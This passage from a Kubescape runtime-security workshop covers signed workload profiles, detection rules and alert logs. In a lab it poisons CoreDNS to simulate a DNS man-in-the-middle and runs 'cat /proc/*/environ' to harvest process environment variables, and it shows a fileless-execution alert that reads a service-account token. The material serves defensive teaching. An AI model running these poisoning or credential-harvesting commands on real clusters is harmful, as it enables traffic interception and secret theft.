    - write
    - writev
    rulePolicies: {}
    imageID: ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b
    imageTag: ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b
EOF
webapp-nn.yaml --- the unsigned NetworkNeighborhood
cat <<'EOF' > webapp-nn.yaml
apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
kind: NetworkNeighborhood
metadata:
  name: webapp-nn
  namespace: webapp
  annotations:
    kubescape.io/managed-by: User
    kubescape.io/status: completed
    kubescape.io/completion: complete
  labels:
    kubescape.io/workload-api-group: apps
    kubescape.io/workload-api-version: v1
    kubescape.io/workload-kind: Deployment
    kubescape.io/workload-name: webapp-mywebapp
    kubescape.io/workload-namespace: webapp
spec:
  matchLabels:
    app.kubernetes.io/name: mywebapp
  containers:
  - name: mywebapp-app
    ingress: []
    egress:
    - dns: fusioncore.ai.
      dnsNames:
      - fusioncore.ai.
      identifier: fusioncore-egress
      ipAddress: "162.0.217.171"
      ports:
      - name: TCP-80
        port: 80
        protocol: TCP
      type: external
    - dns: 171.217.0.162.in-addr.arpa.
      dnsNames:
      - 171.217.0.162.in-addr.arpa.
      identifier: fusioncore-ptr
      ports:
      - name: UDP-53
        port: 53
        protocol: UDP
      type: external
EOF

Notice the key difference from Room 5's AP: we added /bin/sh and /bin/ping to the execs list. The ping.php feature uses shell_exec("ping ..."), so sh and ping are legitimate. Without them, R0001 would fire every time a user pings something --- that's a false positive, not a real attack.

The NetworkNeighborhood declares that fusioncore.ai resolves to 162.0.217.171 on TCP/80. Any connection to fusioncore.ai that lands on a different IP is a Man-in-the-Middle.

Step 3 --- Sign both profiles

docker run --rm -v $(pwd):/work $sign sign --key /work/bob.key --file /work/webapp-ap.yaml --output /work/signed-webapp-ap.yaml
docker run --rm -v $(pwd):/work $sign sign --key /work/bob.key --file /work/webapp-nn.yaml --output /work/signed-webapp-nn.yaml
[info] βœ“ Profile signed successfully
  Issuer: local
Successfully signed object. namespace: webapp; name: webapp-ap; identity: local-key; issuer: local
  Identity: local-key
  Timestamp: 1773511625
βœ“ Signed profile written to: /work/signed-webapp-ap.yaml

Verify the signatures:

docker run --rm -v $(pwd):/work $sign verify --file /work/signed-webapp-ap.yaml --strict=false
docker run --rm -v $(pwd):/work $sign verify --file /work/signed-webapp-nn.yaml --strict=false

Inspect what was added:

docker run --rm -v $(pwd):/work $sign extract-signature --file /work/signed-webapp-ap.yaml

You'll see the signature.kubescape.io/* annotations --- the ECDSA signature, self-signed certificate, issuer (local), identity (local-key), and timestamp.

What happens under the hood when the node-agent loads a signed profile?
                   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
   kubectl apply   β”‚  Signed AP/NN in storage   β”‚
   ───────────────>β”‚  (etcd via API server)     β”‚
                   β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                 β”‚  periodic fetch
                                 β–Ό
                   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                   β”‚  Cache: verify signature   β”‚
                   β”‚                            β”‚
                   β”‚  1. Extract certificate    β”‚
                   β”‚  2. Compute content hash   β”‚
                   β”‚  3. Verify ECDSA signature β”‚
                   β”‚                            β”‚
                   β”‚  βœ“ Valid β†’ cache profile   β”‚
                   β”‚  βœ— Invalid β†’ reject, log   β”‚ (currently implementing: an Alert and Fallback to last verified AP)
                   β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Step 4 --- Deploy to the cluster

Clean up from Room 5 (if the webapp namespace still exists), then deploy:

kubectl delete namespace webapp --ignore-not-found --wait=false
kubectl create namespace webapp

Apply signed profiles first (they must exist before the pod starts):

kubectl apply -f signed-webapp-ap.yaml
kubectl apply -f signed-webapp-nn.yaml

Now deploy the webapp with both profile labels:

kubectl apply -f - <<'EOF'
apiVersion: apps/v1
kind: Deployment
metadata:
  name: webapp-mywebapp
  namespace: webapp
  labels:
    app.kubernetes.io/name: mywebapp
    app.kubernetes.io/instance: webapp
spec:
  replicas: 1
  selector:
    matchLabels:
      app.kubernetes.io/name: mywebapp
      app.kubernetes.io/instance: webapp
  template:
    metadata:
      labels:
        app.kubernetes.io/name: mywebapp
        app.kubernetes.io/instance: webapp
        kubescape.io/user-defined-profile: webapp-ap
        kubescape.io/user-defined-network: webapp-nn
    spec:
      serviceAccountName: default
      containers:
        - name: mywebapp-app
          image: "ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b"
          imagePullPolicy: Always
          ports:
            - name: http
              containerPort: 80
              protocol: TCP
          volumeMounts:
            - mountPath: /host/var/log
              name: nodelog
      volumes:
        - name: nodelog
          hostPath:
            path: /var/log
---
apiVersion: v1
kind: Service
metadata:
  name: webapp-mywebapp
  namespace: webapp
spec:
  type: ClusterIP
  ports:
    - port: 8080
      targetPort: 80
      protocol: TCP
      name: http
  selector:
    app.kubernetes.io/name: mywebapp
    app.kubernetes.io/instance: webapp
EOF

If you now check the node-agent logs:

{"level":"info","ts":"2026-03-14T18:16:26Z","msg":"container has a user defined profile","profile":"webapp-ap","container":"mywebapp-app","workload":"webapp-mywebapp-6fb48bfbcd-v6r22"}
{"level":"info","ts":"2026-03-14T18:16:26Z","msg":"container has a user defined network neighborhood","network":"webapp-nn","container":"mywebapp-app","workload":"webapp-mywebapp-6fb48bfbcd-v6r22"}

This warning is for self-signed:

"Signed ApplicationProfile 'webapp-ap' in namespace 'webapp' has been tampered with: signature verification failed: failed to verify certificate chain: x509: certificate signed by unknown authority"

Step 5 --- Legitimate traffic (no alert)

Port-forward the webapp and ping fusioncore.ai:

sudo kill -9 $(sudo lsof -t -i :8080) 2>/dev/null || true
kubectl --namespace webapp port-forward $(kubectl get pods --namespace webapp -l "app.kubernetes.io/name=mywebapp,app.kubernetes.io/instance=webapp" -o jsonpath="{.items[0].metadata.name}") 8080:80 &

In a second terminal:

curl "127.0.0.1:8080/ping.php?ip=fusioncore.ai"
Ping results for fusioncore.ai:
PING fusioncore.ai (162.0.217.171) 56(84) bytes of data.
64 bytes from server324-1.web-hosting.com (162.0.217.171): icmp_seq=1 ttl=46 time=28.2 ms
64 bytes from server324-1.web-hosting.com (162.0.217.171): icmp_seq=2 ttl=46 time=28.2 ms
64 bytes from server324-1.web-hosting.com (162.0.217.171): icmp_seq=3 ttl=46 time=28.3 ms
64 bytes from server324-1.web-hosting.com (162.0.217.171): icmp_seq=4 ttl=46 time=28.3 ms

The webapp resolves fusioncore.ai β†’ 162.0.217.171 and pings it. The NN allows this domain and IP. Check the logs:

kubectl logs -n kubescape -l app=node-agent -c node-agent -f

No R0005 (DNS is allowed), no R0011 (IP is in the NN). The signed profiles are working.

Step 6 --- MITM attack: poison the cluster DNS

Now simulate a real DNS Man-in-the-Middle by poisoning CoreDNS and make fusioncore.ai resolve to a different IP.

Back up the original CoreDNS config, then inject a spoofed template record that makes fusioncore.ai resolve to 8.8.4.4:

kubectl get cm coredns -n kube-system -o jsonpath='{.data.Corefile}' > ~/coredns-original.conf
sed '/forward \./i\    template IN A fusioncore.ai {\n        answer "fusioncore.ai. 60 IN A 8.8.4.4"\n        fallthrough\n    }' \
  ~/coredns-original.conf > ~/coredns-poisoned.conf
kubectl get cm coredns -n kube-system -o json | \
  jq --rawfile cf ~/coredns-poisoned.conf '.data.Corefile = $cf' | \
  kubectl apply -f -
kubectl rollout restart deploy/coredns -n kube-system
kubectl -n kube-system rollout status deploy/coredns

Now ping fusioncore.ai again:

curl "127.0.0.1:8080/ping.php?ip=fusioncore.ai"
Ping results for fusioncore.ai 
PING fusioncore.ai (8.8.4.4)

Step 7 --- Read the alert

kubectl logs -n kubescape -l app=node-agent -c node-agent | jq
{"BaseRuntimeMetadata":{"alertName":"DNS Anomalies in container","arguments":{"addresses":null,"apChecksum":"a560862b9716c8b94e546230a7b9712f981250d4cc7526c63200b835da658737","domain":"4.4.8.8.in-addr.arpa.","message":"Unexpected domain communication: 4.4.8.8.in-addr.arpa. from: mywebapp-app","port":58011,"protocol":"UDP"},"infectedPID":16901,"severity":1,"size":"4.1 kB","timestamp":"2026-03-14T19:30:37.102756958Z","trace":{},"uniqueID":"ac9a549d90a657259b16cd02a259598d","profileMetadata":{"status":"completed","completion":"complete","name":"webapp-nn","failOnProfile":true,"type":1},"identifiers":{"process":{"name":"ping"},"dns":{"domain":"4.4.8.8.in-addr.arpa."},"network":{"protocol":"UDP"}},"agentVersion":"test-4f42ff4"},"CloudMetadata":null,"RuleID":"R0005","RuntimeK8sDetails":{"clusterName":"default","containerName":"mywebapp-app","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b","imageDigest":"sha256:c622cf306b94e8a6e7cfd718f048015e033614170f19228d8beee23a0ccc57bb","namespace":"webapp","containerID":"9f099baef8a9c8037e64e5e19ef23b32e273b5f4ca8968c5aa6095c2079a5906","podName":"webapp-mywebapp-6fb48bfbcd-74hp8","podNamespace":"webapp","podUID":"9f880bae-3059-40c6-8c11-617ece7332ed","podLabels":{"app.kubernetes.io/instance":"webapp","app.kubernetes.io/name":"mywebapp","kubescape.io/user-defined-network":"webapp-nn","kubescape.io/user-defined-profile":"webapp-ap","pod-template-hash":"6fb48bfbcd"},"workloadName":"webapp-mywebapp","workloadNamespace":"webapp","workloadKind":"Deployment","workloadUID":"50709265-9946-4ec8-9f86-556e459883c6"},"RuntimeProcessDetails":{"processTree":{"pid":12748,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":12304,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","childrenMap":{"apache2␟12784":{"pid":12784,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":12748,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","childrenMap":{"sh␟16900":{"pid":16900,"cmdline":"/bin/sh -c ping -c 4 fusioncore.ai","comm":"sh","ppid":12784,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","path":"/bin/dash","childrenMap":{"ping␟16901":{"pid":16901,"cmdline":"/bin/ping -c 4 fusioncore.ai","comm":"ping","ppid":16900,"pcomm":"sh","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","path":"/bin/ping"}}}}}}},"containerID":"9f099baef8a9c8037e64e5e19ef23b32e273b5f4ca8968c5aa6095c2079a5906"},"level":"error","message":"Unexpected domain communication: 4.4.8.8.in-addr.arpa. from: mywebapp-app","msg":"DNS Anomalies in container","processtree_depth":"4","time":"2026-03-14T19:30:37Z"}

You ll see it 4 times, cause ping is executed 4 times.

Cleanup --- restore CoreDNS and remove the webapp
kubectl get cm coredns -n kube-system -o json | \
  jq --rawfile cf ~/coredns-original.conf '.data.Corefile = $cf' | \
  kubectl apply -f -
kubectl rollout restart deploy/coredns -n kube-system
Cleanup --- remove the webapp
kubectl delete namespace webapp

The Archivist has recorded everything "normal" about this webapp. The signed scrolls are tamper-proof --- any modification to the spec invalidates the signature. The NetworkNeighborhood pins domains to IPs, catching DNS spoofing that would fool any application. Now the profile passes to the Vault for its final transformation before the Inquisitor uses it.

Room 7 -- The Vault of Collapsing Paths

Room 7: The Vault of Collapsing Paths

The Vault Keeper examines every path in the profile and asks: "Shall I remember each leaf individually, or fold them into a wildcard branch?" Her decision depends on magical thresholds inscribed on the CollapseConfig scroll.

  node-agent (tracer Gadgets)              storage signleton
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”             β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚  Incoming Events        β”‚   PreSave   β”‚  Trie-based collapse         β”‚
  β”‚  opens:                 β”‚ ──────────> β”‚                              β”‚
  β”‚   /proc/1/stat          β”‚             β”‚  /proc/                      β”‚
  β”‚   /proc/2/stat          β”‚             β”‚    β”œβ”€β”€ β‹―/                    β”‚
  β”‚   /proc/3/stat          β”‚             β”‚    β”‚   └── stat  (collapsed) β”‚
  β”‚   /proc/4/stat          β”‚             β”‚    └── self/                 β”‚
  β”‚   /proc/self/status     β”‚             β”‚        └── status  (kept)    β”‚
  β”‚   /etc/resolv.conf      β”‚             β”‚  /etc/                       β”‚
  β”‚   /etc/redis/redis.conf β”‚             β”‚    β”œβ”€β”€ resolv.conf           β”‚
  β”‚   ...                   β”‚             β”‚    └── redis/                β”‚
  β”‚                         β”‚             β”‚        └── redis.conf        β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜             β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                                β‹― = matches ONE segment
                                                * = matches ZERO or MORE

The storage component (separate repo: github.com/kubescape/storage) runs a PreSave hook when the profile is persisted. It builds a trie from all paths and collapses directories that exceed their threshold.

The Two Special Symbols

SymbolNameMatchesCreated when
β‹― (U+22EF)DynamicExactly one segmentChildren exceed threshold
*WildcardZero or more segmentsThreshold=1, or adjacent β‹― merge
Validation and prerequisites

Prerequisites: The storage image must include the CollapseConfiguration API (branch feature/collapse-config-crd in the storage repo). Without it, kubectl get collapseconfigurations returns "resource type not found" and storage uses built-in defaults.

Validation rules:

  • openDynamicThreshold must be >= 1
  • endpointDynamicThreshold must be >= 1
  • Each entry: prefix must not be empty, threshold must be >= 1
  • The name default has special meaning --- storage looks for it first

Default vs Vendor Thresholds

A vendor can pre-declare known-dynamic paths via a recommended CollapseConfiguration (CRD)

Lets assume, the vendor has nodejs dynamically pulling in 1000 of files

/mnt/.../opt/dtrace/agent/bin/+/any/nodejs/.../augs/AugFactory.js
/mnt/.../opt/dtrace/agent/bin/+/any/nodejs/.../augs/AugManager.js

The vendor may set a threshold of 3 for /mnt/volume/host/opt/dtrace/agent/bin --- this means that if more than 3 unique paths are observed under that prefix, they will be collapsed into /mnt/volume/host/opt/dtrace/agent/bin/*. This allows the vendor to pre-emptively fold known-dynamic paths, reducing noise and improving detection of truly anomalous paths.

PrefixThreshold
/etc100
/opt5
/var/run3
/app1
default50

add new line:

PrefixSpecific Threshold
...
/mnt/volume/host/opt/dtrace/agent/bin3

This CRDs is signable

The proc Harvester
Side-Quest- The proc Harvester

Challenge: From inside your pod, read /proc/*/environ to steal environment variables from every running process:

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis -o jsonpath='{.items[0].metadata.name}')

kubectl -n redis exec -it $REDIS_POD -- sh -c 'cat /proc/*/environ'

Observe: R0008 (severity 5) fires. The collapsed path /proc/β‹―/environ catches every PID in a single profile entry --- the Vault Keeper folded hundreds of /proc/<pid>/environ paths into one wildcard pattern, and R0008 uses exactly that pattern to detect credential harvesting across all processes.

kubectl logs -n kubescape -l app=node-agent -c node-agent -f | grep R0008

{"BaseRuntimeMetadata":{"alertName":"Read Environment Variables from procfs","arguments":{"apChecksum":"4a47f71249d3fa76d990667495a566db2a7d72beb23949b764006c31d8c6a27a","flags":["O_RDONLY"],"message":"Reading environment variables from procfs: /proc/11873/environ by process cat","path":"/proc/11873/environ"},"infectedPID":271417,"severity":5,"timestamp":"2026-03-17T18:17:54.539234494Z","trace":{},"uniqueID":"ee849f132c7b8234cccbca8f1ee51d54","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"cat"},"file":{"name":"environ","directory":"/proc/11873"}},"agentVersion":"test-4bcd364"},"CloudMetadata":null,"RuleID":"R0008","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:69cdf2a6eda0be0a2238d20c03922f7fbf18e7274e49eda614fb41970ac6bff0","namespace":"redis","containerID":"f35adaf4262d3672d8152a035bbf9f426564812d926ab24dff2468e139d21f83","podName":"redis-54f999cb48-sfb5h","podNamespace":"redis","podUID":"64fea88a-44b4-4d12-b548-19397de5a7eb","workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"ff8ecf3a-2dc2-40ee-8234-06ac4aae6aa7"},"RuntimeProcessDetails":{"processTree":{"pid":271411,"cmdline":"/usr/bin/sh -c cat /proc/*/environ","comm":"sh","ppid":12965,"pcomm":"runc","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/dash","childrenMap":{"cat␟271417":{"pid":271417,"cmdline":"/usr/bin/cat /proc/1/environ /proc/11867/environ /proc/self/environ /proc/thread-self/environ","comm":"cat","ppid":271411,"pcomm":"sh","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/cat"}}},"containerID":"f35adaf4262d3672d8152a035bbf9f426564812d926ab24dff2468e139d21f83"},"level":"error","message":"Reading environment variables from procfs: /proc/11873/environ by process cat","msg":"Read Environment Variables from procfs","processtree_depth":"2","time":"2026-03-17T18:17:54Z"}
{"BaseRuntimeMetadata":{"alertName":"Read Environment Variables from procfs","arguments":{"apChecksum":"4a47f71249d3fa76d990667495a566db2a7d72beb23949b764006c31d8c6a27a","flags":["O_RDONLY"],"message":"Reading environment variables from procfs: /proc/11873/task/11873/environ by process cat","path":"/proc/11873/task/11873/environ"},"infectedPID":271417,"severity":5,"timestamp":"2026-03-17T18:17:54.539418718Z","trace":{},"uniqueID":"82bfe1834be459a931ba5b01d3cbe1da","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"cat"},"file":{"name":"environ","directory":"/proc/11873/task/11873"}},"agentVersion":"test-4bcd364"},"CloudMetadata":null,"RuleID":"R0008","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:69cdf2a6eda0be0a2238d20c03922f7fbf18e7274e49eda614fb41970ac6bff0","namespace":"redis","containerID":"f35adaf4262d3672d8152a035bbf9f426564812d926ab24dff2468e139d21f83","podName":"redis-54f999cb48-sfb5h","podNamespace":"redis","podUID":"64fea88a-44b4-4d12-b548-19397de5a7eb","workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"ff8ecf3a-2dc2-40ee-8234-06ac4aae6aa7"},"RuntimeProcessDetails":{"processTree":{"pid":271411,"cmdline":"/usr/bin/sh -c cat /proc/*/environ","comm":"sh","ppid":12965,"pcomm":"runc","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/dash","childrenMap":{"cat␟271417":{"pid":271417,"cmdline":"/usr/bin/cat /proc/1/environ /proc/11867/environ /proc/self/environ /proc/thread-self/environ","comm":"cat","ppid":271411,"pcomm":"sh","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/cat"}}},"containerID":"f35adaf4262d3672d8152a035bbf9f426564812d926ab24dff2468e139d21f83"},"level":"error","message":"Reading environment variables from procfs: /proc/11873/task/11873/environ by process cat","msg":"Read Environment Variables from procfs","processtree_depth":"2","time":"2026-03-17T18:17:54Z"}

The Vault Keeper's work is done. The profile is collapsed, persisted, and ready. Any future event will be compared against this canonical scroll. The question is: who does the comparing?

Room 8 -- The Inquisitor's Court

Room 8: The Inquisitor's Court

A hooded figure sits on an obsidian throne, flanked by floating tablets inscribed with glowing runes. Each tablet is a CEL expression. When an event arrives, the Inquisitor evaluates every rule. If the answer is "alert" --- the bell tolls.

The Inquisitor's Court
  EnrichedEvent                                          RuleManager.ReportEnrichedEvent()
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                 β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚ exepath:    "/proc/self/fd/3"      β”‚                 β”‚  1. ListRulesForPod(ns, pod)                            β”‚
  β”‚ comm:       "3"                    β”‚ ──────────────> β”‚  2. Filter by eventType == "exec"                       β”‚
  β”‚ args:       ["cat", ".../token"]   β”‚                 β”‚  3. For each rule:                                      β”‚
  β”‚ pcomm:      "perl"                 β”‚                 β”‚       celEvaluator.EvaluateRule(                        β”‚
  β”‚ processTree: { pid: 25489,         β”‚                 β”‚         enrichedEvent, rule.Expressions.RuleExpression) β”‚
  β”‚   ppid: 9806, uid: 999 (redis) }   β”‚                 β”‚  4. If shouldAlert β†’ create RuleFailure                 β”‚
  β”‚ k8s: ns=redis, pod=redis-b477..    β”‚                 β”‚  5. exporter.SendRuleAlert(failure)                     β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ 

The RuleManager receives the enriched event and evaluates every bound rule. For exec events, the critical rule is R1005.

R1005 --- The Fileless Execution Spell

Defined in default-rules.yaml:

- name: "Fileless execution detected"
  id: "R1005"
  severity: 8
  expressions:
    ruleExpression:
      - eventType: "exec"
        expression: >-
          event.exepath.contains('memfd')
          || event.exepath.startsWith('/proc/self/fd')
          || event.exepath.matches('/proc/[0-9]+/fd/[0-9]+')

At this point , let explain that there are three types of rules. You can toggle their profile-dependency in the default-rules.yaml. Be cautious with flooding your system with alerts. It is possible to bind rules via RuleBindings specifically, which is helpful for fine-tuning detections.

Rule Types

The EventType

A very key element of any rule is the gadget it depends on. In this case, the gadget is the exec event type. The Inquisitor evaluates the CEL expression only for events of that type.

The CEL engine maps event.exepath through three layers:

  CEL expression: event.exepath
       β”‚
       β–Ό
  cel.go: CelFields["exepath"].GetFrom
       β”‚  calls x.Raw.GetExePath()
       β–Ό
  datasource_event.go: GetExePath()
       β”‚  calls getFieldAccessor("exepath").String(e.Data)
       β–Ό
  eBPF datasource field "exepath"
       β”‚  the kernel-reported exec path
       β–Ό
  "/proc/self/fd/3"  or  "memfd:pwned"
Source code -- CEL field mapping for exepath

pkg/utils/cel.go:191-201

"exepath": {
    Type:  celtypes.StringType,
    GetFrom: ref.FieldGetter(func(target any) (any, error) {
        x := target.(*xcel.Object[CelEvent])
        return x.Raw.GetExePath(), nil
    }),
},

GetExePath() in datasource_event.go:380:

func (e *DatasourceEvent) GetExePath() string {
    exepath, _ := e.getFieldAccessor("exepath").String(e.Data)
    return exepath
}
Source code -- RuleManager.ReportEnrichedEvent evaluates all rules

pkg/rulemanager/rule_manager.go:134-256

func (rm *RuleManager) ReportEnrichedEvent(enrichedEvent *events.EnrichedEvent) {
    // 1. Look up rules for this pod
    rules = rm.ruleBindingCache.ListRulesForPod(namespace, pod)

    for _, rule := range rules {
        // 2. Filter by event type
        ruleExpressions := rm.getRuleExpressions(rule, eventType)

        // 3. Evaluate CEL
        shouldAlert, _ := rm.celEvaluator.EvaluateRule(
            enrichedEvent, rule.Expressions.RuleExpression)

        if shouldAlert {
            // 4. Cooldown check β€” suppress duplicates
            uniqueID, _ := getUniqueIdAndMessage(...)
            if shouldCooldown, _ := rm.ruleCooldown.ShouldCooldown(
                uniqueID, containerID, rule.ID); shouldCooldown {
                continue // ← identical alert already fired, skip
            }
            // 5. Create alert + send
            ruleFailure := rm.ruleFailureCreator.CreateRuleFailure(...)
            rm.exporter.SendRuleAlert(ruleFailure)
        }
    }
}
Source code -- CEL.EvaluateRule compiles and runs the expression

pkg/rulemanager/cel/cel.go:178-207

func (c *CEL) EvaluateRule(event *events.EnrichedEvent,
    expressions []typesv1.RuleExpression) (bool, error) {

    evalContext := c.createEvalContext(event) // maps "event" β†’ xcel object

    for _, expression := range expressions {
        out, _ := c.evaluateProgramWithContext(expression.Expression, evalContext)
        boolVal := out.Value().(bool)
        if !boolVal {
            return false, nil // all expressions must be true
        }
    }
    return true, nil
}

The compiled program is cached in programCache after first use.

The Alert Payload

When R1005 fires, the ExecAdapter enriches the RuleFailure with exec-specific metadata:

  RuleFailure {
    RuleID:    "R1005"
    AlertName: "Fileless execution detected"
    Severity:  8
    Message:   "Fileless execution detected: exec call \"3\" is from a malicious source"
    Arguments: {
        "args": [
                "/proc/self/fd/3",
                "/var/run/secrets/kubernetes.io/serviceaccount/token"
            ],
        "exec": "/proc/self/fd/3",
    }
    ProcessTree: {
      "pid": 25489,
      "comm": "3",
      "ppid": 9806,
      "pcomm": "containerd-shim",
      "uid": 999, (redis)
      "gid": 999, (redis)
      "cmdline": "/proc/self/fd/3 /var/run/secrets/.../token"
    }
    K8sDetails: {
      namespace: "redis", podName: "redis-b477756-74n4r"
      containerName: "redis", image: "ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10"
    }
    MitreTactic:    "TA0005"  (Defense Evasion)
    MitreTechnique: "T1055"   (Process Injection)
  }
Source code -- ExecAdapter sets alert metadata

pkg/rulemanager/ruleadapters/adapters/exec.go:22-80

func (c *ExecAdapter) SetFailureMetadata(failure types.RuleFailure,
    enrichedEvent *events.EnrichedEvent, _ map[string]any) {

    execPath := utils.GetExecPathFromEvent(execEvent)
    baseRuntimeAlert.InfectedPID = execEvent.GetPID()
    baseRuntimeAlert.Arguments["exec"] = execPath
    baseRuntimeAlert.Arguments["args"] = execEvent.GetArgs()

    runtimeProcessDetails := apitypes.ProcessTree{
        ProcessTree: apitypes.Process{
            Comm:     execEvent.GetComm(),
            Hardlink: execEvent.GetExePath(), // "memfd:pwned"
            Path:     execFullPath,
            Cmdline:  fmt.Sprintf("%s %s", execPath, strings.Join(args, " ")),
        },
    }
}

The Cooldown Ward --- Why the Bell Only Tolls Once

Between step 4 (CEL says "alert") and step 5 (send), there is a gate: the RuleCooldown. It prevents the same alert from flooding the logs.

  CEL: shouldAlert = true
       β”‚
       β–Ό
  getUniqueIdAndMessage()
       β”‚  hashes rule metadata (exepath, args, comm)
       β”‚  into a uniqueID string
       β–Ό
  RuleCooldown.ShouldCooldown(uniqueID, containerID, ruleID)
       β”‚
       β”œβ”€β”€ count = cooldownMap[key]++
       β”‚
       β”œβ”€β”€ count ≀ CooldownAfterCount? β†’ alert fires βœ“
       β”‚
       └── count > CooldownAfterCount? β†’ suppressed (continue) βœ—
                                          β”‚
                                          └── until cache entry expires
                                              (CooldownDuration later)
ConfigDefaultEffect
ruleCooldownAfterCount1Fire once, then suppress
ruleCooldownDuration1hCache TTL --- suppression window
Source code -- RuleCooldown.ShouldCooldown

pkg/rulemanager/rulecooldown/rulecooldown.go:35-50

func (rc *RuleCooldown) ShouldCooldown(uniqueID string,
    containerID string, ruleID string) (bool, int) {

    key := uniqueID + containerID + ruleID

    count, _ := rc.cooldownMap.Get(key)
    count++
    rc.cooldownMap.Add(key, count)

    return count > rc.cooldownConfig.CooldownAfterCount, count
}

Default config from pkg/config/config.go:166-169:

viper.SetDefault("ruleCooldown::ruleCooldownAfterCount", 1)
viper.SetDefault("ruleCooldown::ruleCooldownDuration", 1*time.Hour)

Helm override (set in Room 1):

--set nodeAgent.config.ruleCooldown.ruleCooldownAfterCount=999999

The Network Sentinels --- NN-Based Rules

Two rules guard the network boundary by evaluating traffic against the NetworkNeighborhood (NN) --- the network equivalent of the ApplicationProfile.

Where the ApplicationProfile records what processes run, which endpoints/methods are called and what files are opened, the NN records what domains are resolved and what IPs are contacted. The Inquisitor exposes NN checks as CEL helper functions in the nn.* library:

  DNS event                               Network event
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚ event.name:        β”‚                   β”‚ event.dstAddr: 8.8.4.4 β”‚
  β”‚   "google.com."    β”‚                   β”‚ event.dstPort: 80      β”‚
  β”‚ event.containerId  β”‚                   β”‚ event.pktType: OUTGOINGβ”‚
